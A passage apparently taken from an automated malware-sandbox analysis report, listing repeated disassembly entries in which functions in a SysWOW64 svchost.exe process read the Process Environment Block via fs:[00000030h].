            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h] 2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h] 2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h] 2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h] 2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h] 2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h] 2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h] 2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h] 2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h] 2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h] 2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h] 2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370625D mov eax, dword ptr fs:[00000030h] 2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h] 2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h] 2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h] 2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h] 2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] 2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] 2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] 2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] 2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h] 2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h] 2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] 2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] 2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03660124 mov eax, dword ptr fs:[00000030h] 2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h] 2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h] 2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h] 2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h] 2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h] 2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03670185 mov eax, dword ptr fs:[00000030h] 2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h] 2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h] 2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h] 2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h] 2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
